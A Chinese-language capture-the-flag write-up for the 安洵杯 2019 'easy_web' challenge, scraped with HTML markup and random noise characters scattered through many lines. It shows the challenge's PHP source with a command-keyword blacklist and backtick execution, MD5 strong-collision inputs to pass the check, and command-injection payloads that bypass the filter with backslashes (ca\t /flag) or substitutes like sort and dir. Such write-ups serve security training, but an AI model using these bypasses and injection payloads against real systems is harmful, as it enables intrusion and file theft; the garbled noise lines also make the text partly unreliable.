[安洵杯 2019]easy_web

admin

<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233053765-138473612.png" ></p>
<p>&nbsp;</p>
9 Q. n+ v' D! w<p>&nbsp;</p>
1 D2 O# u5 @! E<p>&nbsp;题目打开如下，?img=TXpVek5UTTFNbVUzTURabE5qYz0&amp;cmd=，同时查看源代码</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233545495-732796719.png" ></p>
4 \& \" m" M* `- W. G<p>&nbsp;</p>
<p>&nbsp;</p>
! q/ |+ b+ t3 L4 R8 b<p>这里有个MD5 is funny，说明这个题目大概率跟MD5有关</p>
<p>然后我抓包了一下，消息头里面没有什么特殊的东西，于是我尝试从url入手</p>
<p>首先把那个进行一次base64位解码</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234007573-1082134416.png" ></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
- W; Q. t- j6 P1 v/ M<p>&nbsp;解码一次以后还是很像base64编码，于是又解码一次</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234057439-916556800.png" ></p>
* I( Z1 h, P- g8 A$ F' s7 D& W1 u<p>&nbsp;</p>
<p>&nbsp;</p>
$ x8 {1 C5 L' w2 _7 I1 X+ L<p>&nbsp;然后用hex解码一下得到了</p>
& C6 w$ Q; t, P# v5 C<div class="cnblogs_Highlighter">
8 C" D1 ~4 {0 K<pre class="brush:sql;gutter:true;">555.png
</pre>
6 x' H$ a0 o4 Q0 E</div>
1 O& s& x" |! @9 O$ ~" T<p>　　用同样的方法把index.php进行加密</p>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">TmprMlpUWTBOalUzT0RKbE56QTJPRGN3
( o8 D5 u; D+ H  z, w</pre>
( B  s6 {/ c  k3 g</div>
" ]7 P' Y- c5 z: [2 n<p>　　然后输入到地址栏</p>
, K, L7 }4 v0 h<p>&nbsp;然后查看源代码，把源代码里面的那一串base64的编码解码</p>
<div class="cnblogs_code">
. G; W) r( u% Z8 v5 O5 E( l8 Z3 r# ~) @<pre>&lt;?<span style="color: rgba(0, 0, 0, 1)">php
</span><span style="color: rgba(0, 128, 128, 1)">error_reporting</span>(<span style="color: rgba(255, 0, 255, 1)">E_ALL</span> || ~ <span style="color: rgba(255, 0, 255, 1)">E_NOTICE</span><span style="color: rgba(0, 0, 0, 1)">);
. V. h0 F0 f% E. {7 G</span><span style="color: rgba(0, 128, 128, 1)">header</span>('content-type:text/html;charset=utf-8'<span style="color: rgba(0, 0, 0, 1)">);
, {8 u, @; F# H7 P# N% M$ `</span><span style="color: rgba(128, 0, 128, 1)">$cmd</span> = <span style="color: rgba(128, 0, 128, 1)">$_GET</span>['cmd'<span style="color: rgba(0, 0, 0, 1)">];
; ~7 A5 i( H: p1 D0 s</span><span style="color: rgba(0, 0, 255, 1)">if</span> (!<span style="color: rgba(0, 0, 255, 1)">isset</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['img']) || !<span style="color: rgba(0, 0, 255, 1)">isset</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['cmd'<span style="color: rgba(0, 0, 0, 1)">]))
    </span><span style="color: rgba(0, 128, 128, 1)">header</span>('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&amp;cmd='<span style="color: rgba(0, 0, 0, 1)">);
, b/ m( d) L1 k) ^: S) m</span><span style="color: rgba(128, 0, 128, 1)">$file</span> = hex2bin(<span style="color: rgba(0, 128, 128, 1)">base64_decode</span>(<span style="color: rgba(0, 128, 128, 1)">base64_decode</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['img'<span style="color: rgba(0, 0, 0, 1)">])));
' X$ y; a9 ^5 }6 D
* k* x) F9 \4 z# J1 K# U</span><span style="color: rgba(128, 0, 128, 1)">$file</span> = <span style="color: rgba(0, 128, 128, 1)">preg_replace</span>("/[^a-zA-Z0-9.]+/", "", <span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">);
</span><span style="color: rgba(0, 0, 255, 1)">if</span> (<span style="color: rgba(0, 128, 128, 1)">preg_match</span>("/flag/i", <span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">)) {
    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> '&lt;img src ="./ctf3.jpeg"&gt;'<span style="color: rgba(0, 0, 0, 1)">;
! Z! s$ S+ k' k    </span><span style="color: rgba(0, 0, 255, 1)">die</span>("xixi～ no flag"<span style="color: rgba(0, 0, 0, 1)">);
  p9 b( b8 s3 [} </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
, r$ ~4 N; Y! ?# v! m    </span><span style="color: rgba(128, 0, 128, 1)">$txt</span> = <span style="color: rgba(0, 128, 128, 1)">base64_encode</span>(<span style="color: rgba(0, 128, 128, 1)">file_get_contents</span>(<span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">));
3 w) V4 Y: L# @# ^5 ~    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;img src='data:image/gif;base64," . <span style="color: rgba(128, 0, 128, 1)">$txt</span> . "'&gt;&lt;/img&gt;"<span style="color: rgba(0, 0, 0, 1)">;
    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;br&gt;"<span style="color: rgba(0, 0, 0, 1)">;
}
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> <span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">;
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;br&gt;"<span style="color: rgba(0, 0, 0, 1)">;
+ l, x5 I/ `7 l. v- r</span><span style="color: rgba(0, 0, 255, 1)">if</span> (<span style="color: rgba(0, 128, 128, 1)">preg_match</span>("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&amp;[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|&lt;|&gt;/i", <span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">)) {
9 ]% Y- e& y' Q- i/ _- K+ c    </span><span style="color: rgba(0, 0, 255, 1)">echo</span>("forbid ~"<span style="color: rgba(0, 0, 0, 1)">);
# a( T3 b: M) A6 y+ n5 \2 F3 t6 S    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;br&gt;"<span style="color: rgba(0, 0, 0, 1)">;
} </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
    </span><span style="color: rgba(0, 0, 255, 1)">if</span> ((<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a'] !== (<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'] &amp;&amp; <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a']) === <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'<span style="color: rgba(0, 0, 0, 1)">])) {
+ w2 u8 G+ ]; U2 i, c        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> `<span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">`;
5 x, ^/ U0 E5 X4 y& m) ~) e" _4 e    } </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
) ?" K0 j, p* ?( F* M* a4 A/ n        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> ("md5 is funny ~"<span style="color: rgba(0, 0, 0, 1)">);
1 v( P  u: {6 `& C    }
* a1 p( J7 f, @6 g# k1 p- Q. i}

</span>?&gt;
&lt;html&gt;
4 S3 r0 u- W1 }&lt;style&gt;<span style="color: rgba(0, 0, 0, 1)">
4 L: S, K7 C% f* _5 G+ J+ i  y  body{
7 s9 e7 w5 c( |$ `' X: i   background</span>:url(./bj.png)  no-<span style="color: rgba(0, 0, 0, 1)">repeat center center;
( _1 @# M9 `" y6 h   background</span>-size:<span style="color: rgba(0, 0, 0, 1)">cover;
. {/ K) Z$ |; q/ h% t   background</span>-attachment:<span style="color: rgba(0, 0, 0, 1)">fixed;
' L2 D/ b! V7 E! t/ Q' {. K   background</span>-color:<span style="color: rgba(0, 128, 0, 1)">#</span><span style="color: rgba(0, 128, 0, 1)">CCCCCC;</span>
<span style="color: rgba(0, 0, 0, 1)">}
</span>&lt;/style&gt;
8 d& z! F' u% q/ P7 [2 J! |&lt;body&gt;
6 r; K; L6 U8 f/ P  Q4 P. G&lt;/body&gt;
3 ^: v1 @* C- b' J! P&lt;/html&gt;</pre>
+ ^" w$ ~% ~% |3 q/ e, }3 |</div>
<p>结合前面的推断，关键代码就在</p>
<div class="cnblogs_code">
<pre>    <span style="color: rgba(0, 0, 255, 1)">if</span> ((<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a'] !== (<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'] &amp;&amp; <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a']) === <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'<span style="color: rgba(0, 0, 0, 1)">])) {
        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> `<span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">`;
    } </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> ("md5 is funny ~"<span style="color: rgba(0, 0, 0, 1)">);
( s3 M+ z( x2 e- }3 g! n    }</span></pre>
</div>
' D+ I3 f* E, E- k& T<p>这种MD5是md5强碰撞</p>
<div class="cnblogs_Highlighter">
) O) B9 c. W0 Q! @3 Y( o) G5 c<pre class="brush:sql;gutter:true;">a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
</pre>
2 {% A0 `5 n' _, y. X</div>
<div class="cnblogs_Highlighter">
- S3 j. c" {" S, \" N: ~<pre class="brush:sql;gutter:true;">b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
</pre>
</div>
<p>　　只需要这样就可以把cmd里面的当成命令来处理。</p>
3 i2 g* m' x+ Q7 O# f2 @* c<p>于是采用payload:</p>
" k1 @- k9 U$ \7 I- u, Q" C4 v6 Q<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211235254110-1699040750.png" ></p>
  p2 t3 q" E% S& J0 z<p>&nbsp;</p>
<p>&nbsp;因为'\'并没有被屏蔽所以可以这么绕过</p>
<p>ls和l\s在命令执行的时候结果是一样的。</p>
; L. q4 O: x/ `3 ]: }8 ?+ O" ~<p>然后发现根目录里面有/flag</p>
  h% q" j& l, K$ G( m<p>于是payload:</p>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">?cmd=ca\t%20/flag
4 W8 V/ D- c! G$ D: e( X$ K</pre>
1 h2 {! D3 ~1 H; |% u7 R$ Y* h* B</div>
! t2 w& I7 n% U5 F9 \4 R! V8 }<p>　　对于这个题目，因为他没有屏蔽sort和dir</p>
<p>所以查看也可以用dir来代替ls，cat可以用sort来代替。</p>
<p>&nbsp;</p>
$ f; H- E' l6 B/ Q! ]